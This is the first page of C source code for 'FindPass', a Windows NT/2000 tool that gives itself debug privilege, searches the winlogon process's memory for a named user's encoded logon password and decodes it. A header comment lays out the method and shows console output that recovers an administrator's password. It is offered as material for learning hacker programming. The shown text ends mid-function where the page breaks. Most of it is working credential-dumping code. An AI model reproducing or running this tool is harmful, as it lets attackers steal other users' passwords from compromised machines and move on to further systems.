
findpass source code (findpass源代碼.txt)

Useful for gaining some understanding of hacker programming.

Page 1 of 2
// Find Password from winlogon in win2000 / winnt4 + < sp6
//
// PasswordReminder.cpp --> FindPass.cpp
// 1. http://www.smidgeonsoft.com/
// 2. shotgun add comment, bingle change a little to find other user in winlogon
// This code is licensed under the terms of the GPL (gnu public license). 
//
// Usage: FindPass DomainName UserName PID-of-WinLogon
//
// you can get the three params from pulist output in target system.
//

/*
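The logon domain name and user name are stored in plaintext in the winlogon process, whereas PasswordReminder is restricted to looking up the password of the user who owns the current process
<lines 167-174: GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); 
GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400); 
>. It then searches the address space of the winlogon process for UserDomain and UserName <line 590: // Search WinLogon's memory space for the UserName and DomainName strings 
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0) 
&& 
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0)) 
>, and once they are found it looks up the encoded password that follows. 

In fact, you only need to specify the user name and the winlogon process to search yourself; as long as you are an administrator, the password of any user who logged on to this machine through the msgina.dll graphical logon can be found. 

1. Run pulist to find the domain names and user names logged on to the system, and the winlogon process IDs. 
2. Then search each winlogon process ID for the specified user.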

example: 

C:\Documents and Settings\bingle>pulist 
Process PID User 
Idle 0 
System 8 
smss.exe 164 NT AUTHORITY\SYSTEM 
csrss.exe 192 NT AUTHORITY\SYSTEM 
winlogon.exe 188 NT AUTHORITY\SYSTEM 
wins.exe 1212 NT AUTHORITY\SYSTEM 
Explorer.exe 388 TEST-2KSERVER\Administrator 
internat.exe 1828 TEST-2KSERVER\Administrator 
conime.exe 1868 TEST-2KSERVER\Administrator 
msiexec.exe 1904 NT AUTHORITY\SYSTEM 
tlntsvr.exe 1048 NT AUTHORITY\SYSTEM 
taskmgr.exe 1752 TEST-2KSERVER\Administrator 
csrss.exe 2056 NT AUTHORITY\SYSTEM 
winlogon.exe 2416 NT AUTHORITY\SYSTEM 
rdpclip.exe 2448 TEST-2KSERVER\clovea 
Explorer.exe 2408 TEST-2KSERVER\clovea 
internat.exe 1480 TEST-2KSERVER\clovea 
cmd.exe 2508 TEST-2KSERVER\Administrator 
ntshell.exe 368 TEST-2KSERVER\Administrator 
ntshell.exe 1548 TEST-2KSERVER\Administrator 
ntshell.exe 1504 TEST-2KSERVER\Administrator 
csrss.exe 1088 NT AUTHORITY\SYSTEM 
winlogon.exe 1876 NT AUTHORITY\SYSTEM 
rdpclip.exe 1680 TEST-2KSERVER\bingle 
Explorer.exe 2244 TEST-2KSERVER\bingle 
conime.exe 2288 TEST-2KSERVER\bingle 
internat.exe 1592 TEST-2KSERVER\bingle 
cmd.exe 1692 TEST-2KSERVER\bingle 
mdm.exe 2476 TEST-2KSERVER\bingle 
taskmgr.exe 752 TEST-2KSERVER\bingle 
pulist.exe 2532 TEST-2KSERVER\bingle 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
administrator 188 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 188 (0x000000bc). 
To find TEST-2KSERVER\administrator password in process 188 ... 
The encoded password is found at 0x008e0800 and has a length of 10. 
The logon information is: TEST-2KSERVER/administrator/testserver. 
The hash byte is: 0x13. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
clovea 1876 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 1876 (0x00000754). 
To find TEST-2KSERVER\clovea password in process 1876 ... 
PasswordReminder is unable to find the password in memory. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
bingle 1876 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 1876 (0x00000754). 
To find TEST-2KSERVER\bingle password in process 1876 ... 
The logon information is: TEST-2KSERVER/bingle. 
There is no password. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
clovea 2416 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 2416 (0x00000970). 
To find TEST-2KSERVER\clovea password in process 2416 ... 
The logon information is: TEST-2KSERVER/clovea. 
There is no password. 

C:\Documents and Settings\bingle> 

*/

#include <stdafx.h>
#include <windows.h> 
#include <tchar.h> 
#include <stdio.h> 
#include <stdlib.h> 

typedef struct _UNICODE_STRING 
{ 
USHORT Length; 
USHORT MaximumLength; 
PWSTR Buffer; 
} UNICODE_STRING, *PUNICODE_STRING; 

// Undocumented typedef's 
typedef struct _QUERY_SYSTEM_INFORMATION 
{ 
DWORD GrantedAccess; 
DWORD PID; 
WORD HandleType; 
WORD HandleId; 
DWORD Handle; 
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; 
typedef struct _PROCESS_INFO_HEADER 
{ 
DWORD Count; 
DWORD Unk04; 
DWORD Unk08; 
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; 
typedef struct _PROCESS_INFO 
{ 
DWORD LoadAddress; 
DWORD Size; 
DWORD Unk08; 
DWORD Enumerator; 
DWORD Unk10; 
char Name [0x108]; 
} PROCESS_INFO, *PPROCESS_INFO; 
typedef struct _ENCODED_PASSWORD_INFO 
{ 
DWORD HashByte; 
DWORD Unk04; 
DWORD Unk08; 
DWORD Unk0C; 
FILETIME LoggedOn; 
DWORD Unk18; 
DWORD Unk1C; 
DWORD Unk20; 
DWORD Unk24; 
DWORD Unk28; 
UNICODE_STRING EncodedPassword; 
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; 

typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); 
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); 
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); 
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); 
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); 

// Private Prototypes 
BOOL IsWinNT (void); 
BOOL IsWin2K (void); 
BOOL AddDebugPrivilege (void); 
DWORD FindWinLogon (void); 
BOOL LocatePasswordPageWinNT (DWORD, PDWORD); 
BOOL LocatePasswordPageWin2K (DWORD, PDWORD); 
void DisplayPasswordWinNT (void); 
void DisplayPasswordWin2K (void); 

// Global Variables 
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; 
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; 
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; 
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; 
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; 

DWORD PasswordLength = 0; 
PVOID RealPasswordP = NULL; 
PVOID PasswordP = NULL; 
DWORD HashByte = 0;
wchar_t UserName [0x400]; 
wchar_t UserDomain [0x400]; 

int __cdecl main( int argc, char* argv[] ) 
{ 
printf( "\n\t To Find Password in the Winlogon process\n" );
 printf( " Usage: %s DomainName UserName PID-of-WinLogon\n\n", argv[0] ); 

if ((!IsWinNT ()) 
&& 
(!IsWin2K ())) 
{ 
printf ("Windows NT or Windows 2000 are required.\n"); 
return (0); 
} 

// Add debug privilege to PasswordReminder - 
// this is needed for the search for Winlogon. 
// Raise PasswordReminder's privileges so that 
// PasswordReminder can open and debug the Winlogon process 
if (!AddDebugPrivilege ()) 
{ 
printf 
("Unable to add debug privilege.\n"); 
return (0); 
} 
printf ("The debug privilege has been added to PasswordReminder.\n"); 

// Get the entry-point addresses of several undocumented APIs 
HINSTANCE hNtDll = 
LoadLibrary 
("NTDLL.DLL"); 
pfnNtQuerySystemInformation = 
(PFNNTQUERYSYSTEMINFORMATION) GetProcAddress 
(hNtDll, 
"NtQuerySystemInformation"); 
pfnRtlCreateQueryDebugBuffer = 
(PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress 
(hNtDll, 
"RtlCreateQueryDebugBuffer"); 
pfnRtlQueryProcessDebugInformation = 
(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress 
(hNtDll, 
"RtlQueryProcessDebugInformation"); 
pfnRtlDestroyQueryDebugBuffer = 
(PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress 
(hNtDll, 
"RtlDestroyQueryDebugBuffer"); 
pfnRtlRunDecodeUnicodeString = 
(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress 
(hNtDll, 
"RtlRunDecodeUnicodeString"); 

// Locate WinLogon's PID - need debug privilege and admin rights. 
// Get the PID of the Winlogon process 
// The author uses several Native APIs here; PSAPI would work just as well 
DWORD WinLogonPID = 
argc > 3 ? atoi( argv[3] ) : FindWinLogon () ; 
if (WinLogonPID == 0) 
{ 
printf 
("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n"); 
printf 
("PasswordReminder is unable to find the password in memory.\n"); 
FreeLibrary (hNtDll); 
return (0); 
} 

 printf("The WinLogon process id is %d (0x%8.8lx).\n", 
   WinLogonPID, WinLogonPID); 

// Set values to check memory block against. 
// Initialize the variables related to the user account 
 memset(UserName, 0, sizeof (UserName)); 
 memset(UserDomain, 0, sizeof (UserDomain)); 
 if( argc > 2 )
 { 
  mbstowcs( UserName, argv[2], sizeof(UserName)/sizeof(*UserName) );
  mbstowcs( UserDomain, argv[1], sizeof(UserDomain)/sizeof(*UserDomain) );
 }else
 {
  GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); 
  GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400); 
 }
 printf( " To find %S\\%S password in process %d ...\n", UserDomain, UserName, WinLogonPID );

// Locate the block of memory containing 
// the password in WinLogon's memory space. 
// Locate the memory block that contains the password in the Winlogon process 
BOOL FoundPasswordPage = FALSE; 
if (IsWin2K ()) 
FoundPasswordPage = 
LocatePasswordPageWin2K 
(WinLogonPID, 
&PasswordLength); 
else 
FoundPasswordPage = 
LocatePasswordPageWinNT 
(WinLogonPID, 
&PasswordLength); 

if (FoundPasswordPage) 
{ 
if (PasswordLength == 0) 
{ 
printf 
("The logon information is: %S/%S.\n", 
UserDomain, 
UserName); 
printf 
("There is no password.\n"); 
} 
else 
{ 
printf 
("The encoded password is found at 0x%8.8lx and has a length of %d.\n", 
RealPasswordP, 
PasswordLength); 
// Decode the password string. 
if (IsWin2K ()) 
DisplayPasswordWin2K (); 
else 
DisplayPasswordWinNT (); 
} 
} 
else 
printf 
("PasswordReminder is unable to find the password in memory.\n"); 

FreeLibrary 
(hNtDll); 
return (0); 
} // main 

// 
// IsWinNT checks whether the operating system is Windows NT 
// 
BOOL 
IsWinNT 
(void) 
{ 
OSVERSIONINFO OSVersionInfo; 
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); 
if (GetVersionEx 
(&OSVersionInfo)) 
return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT); 
else 
return (FALSE); 
} // IsWinNT 


// 
// IsWin2K checks whether the operating system is Windows 2000 
// 
BOOL 
IsWin2K 
(void) 
{ 
OSVERSIONINFO OSVersionInfo; 
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); 
if (GetVersionEx 
(&OSVersionInfo)) 
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) 
&& 
(OSVersionInfo.dwMajorVersion == 5)); 
else 
return (FALSE); 
} // IsWin2K 


// 
// AddDebugPrivilege requests the privilege needed to debug the Winlogon process 
// 
BOOL 
AddDebugPrivilege 
(void) 
{ 
HANDLE Token; 
TOKEN_PRIVILEGES TokenPrivileges, PreviousState; 
DWORD ReturnLength = 0; 
if (OpenProcessToken 
(GetCurrentProcess (), 
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, 
&Token)) 
if (LookupPrivilegeValue 
(NULL, 
"SeDebugPrivilege", 
&TokenPrivileges.Privileges[0].Luid)) 
{ 
TokenPrivileges.PrivilegeCount = 1; 
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
return 
(AdjustTokenPrivileges 
(Token, 
FALSE, 
&TokenPrivileges, 
sizeof (TOKEN_PRIVILEGES), 
&PreviousState, 
&ReturnLength)); 
} 
return (FALSE); 
} // AddDebugPrivilege 


// 
// Note that the following code eliminates the need 
// for PSAPI.DLL as part of the executable. 
// FindWinLogon locates the WinLogon process 
// Because the author uses the Native API, PSAPI support is not needed 
// 
DWORD 
FindWinLogon 
(void) 
{ 
#define INITIAL_ALLOCATION 0x100 
DWORD rc = 0; 
DWORD SizeNeeded = 0; 
PVOID InfoP = 
HeapAlloc 
(GetProcessHeap (), 
HEAP_ZERO_MEMORY, 
INITIAL_ALLOCATION); 
// Find how much memory is required. 
pfnNtQuerySystemInformation 
(0x10, 
InfoP, 
INITIAL_ALLOCATION, 
&SizeNeeded); 
HeapFree 
(GetProcessHeap (), 
0, 
InfoP); 
// Now, allocate the proper amount of memory. 
InfoP = 
HeapAlloc 
(GetProcessHeap (), 
HEAP_ZERO_MEMORY, 
SizeNeeded); 
DWORD SizeWritten = SizeNeeded; 
if (pfnNtQuerySystemInformation 
